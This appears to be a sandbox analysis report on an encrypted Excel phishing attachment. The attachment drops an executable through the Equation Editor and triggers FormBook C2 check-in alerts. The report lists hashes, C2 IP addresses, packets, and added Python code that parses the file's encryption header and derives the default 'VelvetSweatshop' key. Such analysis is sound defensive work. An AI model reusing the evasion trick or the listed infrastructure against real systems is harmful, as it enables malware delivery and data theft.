                                                                                                                                                          SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                          MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                          SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                          SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                          SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8300874A.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):11303
Entropy (8bit):7.909402464702408
Encrypted:false
SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBC9332D.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:dropped
Size (bytes):62140
Entropy (8bit):7.529847875703774
Encrypted:false
SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:722C1BE1697CFCEAE7BDEFB463265578
SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2ACE7B2.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):648132
Entropy (8bit):2.8123650159483695
Encrypted:false
SSDEEP:3072:m34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:I4UcLe0JOcXuunhqcS
MD5:3B90792776F3D826839423A2699535EB
SHA1:C3D3837C5467537BDF6D41539E80D2CBDFD05B57
SHA-256:C1E498EC3C599E0A0CEE1FBE3D3591517740DED57D7E3171E3C8175F7890C373
SHA-512:1547E503080B35E6A61F8457E87A0F86202926B9DE5B2873D045A4E3EA944681497E6FB671F96D51D51887B6BDD459B46EE6AC57E4B57379CE14B0C054C0006D
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4725290.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:dropped
Size (bytes):85020
Entropy (8bit):7.2472785111025875
Encrypted:false
SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:738BDB90A9D8929A5FB2D06775F3336F
SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4BDA71E.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):11303
Entropy (8bit):7.909402464702408
Encrypted:false
SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:false
C:\Users\user\Desktop\~$Swift-Payment_Details.xlsx
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
C:\Users\Public\vbc.exe
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):188889
Entropy (8bit):7.939883976403979
Encrypted:false
SSDEEP:3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
MD5:57F3AE2842FFB5CEEA386D0B97A52818
SHA1:68423398D025D3CBBB944EE4C3CEA5501DF67761
SHA-256:A0C7B3D44A5CFCDA917FC80C099DA5AB3DE582FF7C24F1373B4BD25F88D61E52
SHA-512:F398186C2F5ADB9726AAC3AEAD8289ABC9288404B4B39DBABC66494A77B0160CA560CF52C9F76B15B34619F150F516A74DB96DB967F75942F3C9F325C5DA4A81
Malicious:true

Static File Info

General

File type:CDFV2 Encrypted
Entropy (8bit):7.994796496723682
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:Swift-Payment_Details.xlsx
File size:1326080
MD5:975a4017075c97740e54740fc8d24f77
SHA1:0a483229a6fa9a61575bcdd3068a5707d17034c5
SHA256:01d8b4b3103b1ecee2ced7a9437bc2c512918199ed9238040b775ee7196e8ede
SHA512:9f7fc6380f8bc90611f0c7fdade84a6d1299de6566d6dd850b1cbaf87b9afdc3eda397773c46b0216368e95838ba0397cd23dcc4f8517bf270584e15cbc6a44b
SSDEEP:24576:o2fw17LGeaqT49SbLoW6j1qiF35O3sVzkEohNyJrXz6Q/fWrpqWnnQIEb:16aqT46aq65usO4n6wWkWnU

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "Swift-Payment_Details.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
Entropy: 2.73637206947
Base64 Encoded: False
Data ASCII: . . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw: 08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
Entropy: 2.7597816111
Base64 Encoded: False
Data ASCII: . . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw: 08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
Entropy: 3.13335930328
Base64 Encoded: False
Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
Entropy: 2.79079600998
Base64 Encoded: False
Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1311336
Entropy: 7.99889031885
Base64 Encoded: True
Data ASCII: ` . . . . . . . . : . y T = . < l . . . . . . ' $ t T . } . . ] a - ) 6 . . . . . . . . . . . o . . . . f . N 8 2 . . . y . q . . 2 . . . . h ` G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . .
Data Raw: 60 02 14 00 00 00 00 00 bd 3a c4 79 54 3d cd 3c 6c c0 a8 ef d9 dc f4 27 24 74 54 0c 7d aa c6 5d 61 2d 29 36 01 2e f5 c2 0f 8b e7 b8 ab 92 0f 6f 07 95 96 99 66 ce 4e 38 32 ef 97 85 79 be 71 0a 11 32 ee f5 17 93 68 60 47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa 47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa 47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa 47 2e 06 a4 89 b7 e0 c8

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
Entropy: 4.58512236603
Base64 Encoded: False
Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . p . 1 . . . . . . . . " a . . . . . . . l . f . . . . . . . . . . . 1 w . ' . 2 . . . . . { . H Y L . 0 . . . . Q . | W . . > k
Data Raw: 04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00
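The stream listing above is the layout of an OOXML package wrapped in ECMA-376 "standard" encryption: the DataSpaces scaffolding, an EncryptionInfo stream whose first bytes are 04 00 02 00 (version 4.2), flags 0x24 (fCryptoAPI | fAES), AlgID 0x660E (AES-128), AlgIDHash 0x8004 (SHA-1), KeySize 0x80 and the "Microsoft Enhanced RSA and AES Cryptographic Provider" CSP name, followed by an EncryptedPackage stream whose first eight bytes (60 02 14 00 00 00 00 00 = 1311328) give the plaintext length. Excel encrypts with the fixed password "VelvetSweatshop" when no user password is set and silently tries that password on open, so the workbook opens without a prompt while a scanner that does not decrypt sees only a high-entropy blob. The example below is added here and is not part of the sandbox report or its vendor's code: it parses the header bytes printed above, derives the key for "VelvetSweatshop" following the MS-OFFCRYPTO §2.3.4.7 procedure, and counts repeated 16-byte ciphertext blocks. The report shows only the first 128 of the 224 EncryptionInfo bytes, so the 16-byte salt and the encrypted verifier at offset 152 are not available; the derivation therefore runs on a constructed all-zero salt (labelled as such in the code) and the password cannot be confirmed against this sample from the page alone.

```python
import hashlib
import struct

# EncryptionInfo bytes as printed in the report's "Data Raw" column above. The page shows
# only the first 128 of the stream's 224 bytes, so the CSP name is cut off and the
# EncryptionVerifier (salt, encrypted verifier, encrypted verifier hash) is not available.
ENCRYPTION_INFO_PREFIX = bytes.fromhex(
    "04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 "
    "04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 "
    "4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 "
    "68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 "
    "6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 "
    "6f 00 67 00 72 00 61 00 70 00 68 00"
)
# First 128 bytes of the EncryptedPackage stream, also copied from the report.
ENCRYPTED_PACKAGE_PREFIX = bytes.fromhex(
    "60 02 14 00 00 00 00 00 "
    "bd 3a c4 79 54 3d cd 3c 6c c0 a8 ef d9 dc f4 27 "
    "24 74 54 0c 7d aa c6 5d 61 2d 29 36 01 2e f5 c2 "
    "0f 8b e7 b8 ab 92 0f 6f 07 95 96 99 66 ce 4e 38 "
    "32 ef 97 85 79 be 71 0a 11 32 ee f5 17 93 68 60 "
    "47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa "
    "47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa "
    "47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa "
    "47 2e 06 a4 89 b7 e0 c8"
)

STANDARD_VERSIONS = {(2, 2), (3, 2), (4, 2)}  # vMajor.vMinor of ECMA-376 standard encryption
ALG_ID = {0x6801: "RC4", 0x660E: "AES-128", 0x660F: "AES-192", 0x6610: "AES-256"}
HASH_ID = {0x8004: "SHA-1"}
FLAG_BITS = {0x04: "fCryptoAPI", 0x08: "fDocProps", 0x10: "fExternal", 0x20: "fAES"}


def parse_encryption_info(data):
    """Decode EncryptionVersionInfo and EncryptionHeader at the start of EncryptionInfo."""
    v_major, v_minor, flags, header_size = struct.unpack_from("<HHII", data, 0)
    if (v_major, v_minor) not in STANDARD_VERSIONS:
        raise ValueError(f"not standard encryption (version {v_major}.{v_minor}); agile is 4.4")
    (_hdr_flags, _size_extra, alg_id, alg_id_hash,
     key_size, provider_type, _res1, _res2) = struct.unpack_from("<8I", data, 12)
    # CSPName is a NUL-terminated UTF-16LE string occupying the rest of the header.
    csp_raw = data[44:12 + header_size]
    csp_name = csp_raw[:len(csp_raw) & ~1].decode("utf-16-le").split("\x00", 1)[0]
    return {
        "version": (v_major, v_minor),
        "flags": [name for bit, name in FLAG_BITS.items() if flags & bit],
        "cipher": ALG_ID.get(alg_id, hex(alg_id)),
        "hash": HASH_ID.get(alg_id_hash, hex(alg_id_hash)),
        "key_bits": key_size,
        "provider_type": provider_type,
        "csp_name": csp_name,
        "verifier_offset": 12 + header_size,  # EncryptionVerifier follows the header
    }


def derive_standard_key(password, salt, key_bytes):
    """Password-to-key derivation of MS-OFFCRYPTO 2.3.4.7 (standard encryption, SHA-1)."""
    h = hashlib.sha1(salt + password.encode("utf-16-le")).digest()
    for i in range(50000):  # fixed spin count; 32-bit LE iterator prepended each round
        h = hashlib.sha1(struct.pack("<I", i) + h).digest()
    h_final = hashlib.sha1(h + struct.pack("<I", 0)).digest()  # block number 0

    def pad_hash(fill):
        buf = bytearray([fill] * 64)
        for i, b in enumerate(h_final):
            buf[i] ^= b
        return hashlib.sha1(bytes(buf)).digest()

    return (pad_hash(0x36) + pad_hash(0x5C))[:key_bytes]


def parse_encrypted_package(stream):
    """EncryptedPackage = 8-byte LE plaintext length, then the AES-ECB ciphertext."""
    (plain_len,) = struct.unpack_from("<Q", stream, 0)
    return plain_len, stream[8:]


def repeated_ciphertext_blocks(ciphertext, block_size=16):
    """Count ciphertext blocks seen more than once; with ECB, equal plaintext blocks
    produce equal ciphertext blocks, so repeats leak structure of the package."""
    counts = {}
    for i in range(0, len(ciphertext) - block_size + 1, block_size):
        block = ciphertext[i:i + block_size].hex()
        counts[block] = counts.get(block, 0) + 1
    return {b: n for b, n in counts.items() if n > 1}


if __name__ == "__main__":
    print(parse_encryption_info(ENCRYPTION_INFO_PREFIX))
    plain_len, ct = parse_encrypted_package(ENCRYPTED_PACKAGE_PREFIX)
    print(plain_len, repeated_ciphertext_blocks(ct))
    # Constructed all-zero salt: the real salt sits at offset 152, beyond the page's excerpt.
    print(derive_standard_key("VelvetSweatshop", b"\x00" * 16, 16).hex())
```

Two things the parsed values confirm: the EncryptedPackage stream (1311336 bytes) is exactly 8 bytes longer than the declared plaintext (1311328), so the package was already a multiple of 16 and carries no padding; and the block 47 2e 06 a4 ... a6 d8 aa recurs three times within the 120 visible ciphertext bytes (and the "G . . . . . . . i . h" pattern keeps repeating in the Data ASCII column), which is the ECB signature of a run of identical 16-byte plaintext blocks inside the package. To actually confirm "VelvetSweatshop", read the salt and the two encrypted verifier fields at offset 152 of the full stream, AES-128-ECB decrypt them with the derived key and check that SHA-1(Verifier) matches the first 20 bytes of the decrypted hash; msoffcrypto-tool implements that check and will also decrypt the package.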

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/22/21-17:23:19.807859 | TCP | 2022550 | ET TROJAN Possible Malicious Macro DL EXE Feb 2016 | 49167 | 80 | 192.168.2.22 | 192.210.173.40
07/22/21-17:24:37.561999 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 173.255.194.134
07/22/21-17:24:37.561999 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 173.255.194.134
07/22/21-17:24:37.561999 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 173.255.194.134
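The alerts describe two flows: a download on port 49167 to 192.210.173.40 flagged by ET rule 2022550, and, 78 seconds later, FormBook check-ins on port 49168 to 173.255.194.134 flagged by three rules at once. Snort timestamps carry microseconds and the packet table below carries nanoseconds, so pivoting from an alert to the packet that triggered it needs the two clocks normalised. The following is an added example, not part of the sandbox report or its vendor's tooling: it parses the alert rows above and the first nine rows of the packet table (copied from the report, so the excerpt covers only the start of the download flow), rebuilds flows, and attributes each alert to the packet with the same 5-tuple and the same time of day within a microsecond.

```python
import re
from collections import defaultdict

# Constructed input: the four Snort rows from the table above and the first nine rows of
# the TCP packet table that follows it, copied from the report. The excerpt only covers
# the start of the download flow on port 49167; the C2 check-in packets on port 49168
# happen later and are not in it.
SNORT_ALERTS = """\
07/22/21-17:23:19.807859 TCP 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 49167 80 192.168.2.22 192.210.173.40
07/22/21-17:24:37.561999 TCP 2031453 ET TROJAN FormBook CnC Checkin (GET) 49168 80 192.168.2.22 173.255.194.134
07/22/21-17:24:37.561999 TCP 2031449 ET TROJAN FormBook CnC Checkin (GET) 49168 80 192.168.2.22 173.255.194.134
07/22/21-17:24:37.561999 TCP 2031412 ET TROJAN FormBook CnC Checkin (GET) 49168 80 192.168.2.22 173.255.194.134
"""
TCP_PACKETS = """\
Jul 22, 2021 17:23:19.602353096 CEST 49167 80 192.168.2.22 192.210.173.40
Jul 22, 2021 17:23:19.807230949 CEST 80 49167 192.210.173.40 192.168.2.22
Jul 22, 2021 17:23:19.807353973 CEST 49167 80 192.168.2.22 192.210.173.40
Jul 22, 2021 17:23:19.807858944 CEST 49167 80 192.168.2.22 192.210.173.40
Jul 22, 2021 17:23:20.009445906 CEST 80 49167 192.210.173.40 192.168.2.22
Jul 22, 2021 17:23:20.009484053 CEST 80 49167 192.210.173.40 192.168.2.22
Jul 22, 2021 17:23:20.009505987 CEST 80 49167 192.210.173.40 192.168.2.22
Jul 22, 2021 17:23:20.009529114 CEST 80 49167 192.210.173.40 192.168.2.22
Jul 22, 2021 17:23:20.009706020 CEST 49167 80 192.168.2.22 192.210.173.40
"""

ALERT_RE = re.compile(r"^(\S+) (TCP|UDP) (\d+) (.+?) (\d+) (\d+) (\S+) (\S+)$")
PACKET_RE = re.compile(r"^\w{3} \d{1,2}, \d{4} (\d\d:\d\d:\d\d\.\d+) \w+ (\d+) (\d+) (\S+) (\S+)$")


def time_of_day_ns(hms):
    """'HH:MM:SS.frac' -> nanoseconds since midnight. Snort prints microseconds and the
    packet table prints nanoseconds; both are widened to nine fractional digits here."""
    clock, frac = hms.split(".")
    h, m, s = (int(x) for x in clock.split(":"))
    return (h * 3600 + m * 60 + s) * 10**9 + int(frac.ljust(9, "0")[:9])


def parse_alerts(text):
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if m:
            ts, proto, sid, msg, sport, dport, src, dst = m.groups()
            alerts.append({"ts_ns": time_of_day_ns(ts.split("-", 1)[1]), "proto": proto,
                           "sid": int(sid), "msg": msg, "src": src, "sport": int(sport),
                           "dst": dst, "dport": int(dport)})
    return alerts


def parse_packets(text):
    packets = []
    for line in text.splitlines():
        m = PACKET_RE.match(line)
        if m:
            ts, sport, dport, src, dst = m.groups()
            packets.append({"ts_ns": time_of_day_ns(ts), "src": src, "sport": int(sport),
                            "dst": dst, "dport": int(dport)})
    return packets


def build_flows(packets):
    """Group packets into bidirectional flows keyed (client ip, client port, server ip,
    server port); the side with the higher (ephemeral) port is taken as the client."""
    flows = defaultdict(lambda: {"to_server": 0, "to_client": 0, "first_ns": None, "last_ns": None})
    for p in packets:
        to_server = p["sport"] > p["dport"]
        key = ((p["src"], p["sport"], p["dst"], p["dport"]) if to_server
               else (p["dst"], p["dport"], p["src"], p["sport"]))
        f = flows[key]
        f["to_server" if to_server else "to_client"] += 1
        f["first_ns"] = p["ts_ns"] if f["first_ns"] is None else min(f["first_ns"], p["ts_ns"])
        f["last_ns"] = p["ts_ns"] if f["last_ns"] is None else max(f["last_ns"], p["ts_ns"])
    return dict(flows)


def match_alerts_to_packets(alerts, packets, tolerance_ns=1_000):
    """Attribute each alert to the packet it fired on: same 5-tuple and the same time of
    day within 1 us, which absorbs the precision difference between the two clocks."""
    matches = {}
    for a in alerts:
        hit = None
        for p in packets:
            same_tuple = ((p["src"], p["sport"], p["dst"], p["dport"])
                          == (a["src"], a["sport"], a["dst"], a["dport"]))
            if same_tuple and abs(p["ts_ns"] - a["ts_ns"]) <= tolerance_ns:
                hit = p
                break
        matches[a["sid"]] = hit
    return matches


if __name__ == "__main__":
    alerts, packets = parse_alerts(SNORT_ALERTS), parse_packets(TCP_PACKETS)
    for key, f in build_flows(packets).items():
        print(key, f)
    for sid, p in match_alerts_to_packets(alerts, packets).items():
        print(sid, "fired on packet index", packets.index(p) if p else "not in excerpt")
```

On this excerpt rule 2022550 lands on the fourth packet of the flow (17:23:19.807858944 CEST, 56 ns off the alert's 17:23:19.807859), which is the first client-to-server packet after the three-packet exchange that opens the connection, i.e. the request that fetched the payload; the three FormBook SIDs fire on the same microsecond and resolve to no packet here because the port 49168 flow lies outside the rows copied. Run against the full packet list, the same matcher identifies the check-in request as well.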

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:23:19.602353096 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:19.807230949 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:19.807353973 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:19.807858944 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.009445906 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.009484053 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.009505987 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.009529114 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.009706020 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.208898067 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.208935976 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.208956957 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.208980083 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.209002018 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.209022999 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.209044933 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.209067106 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
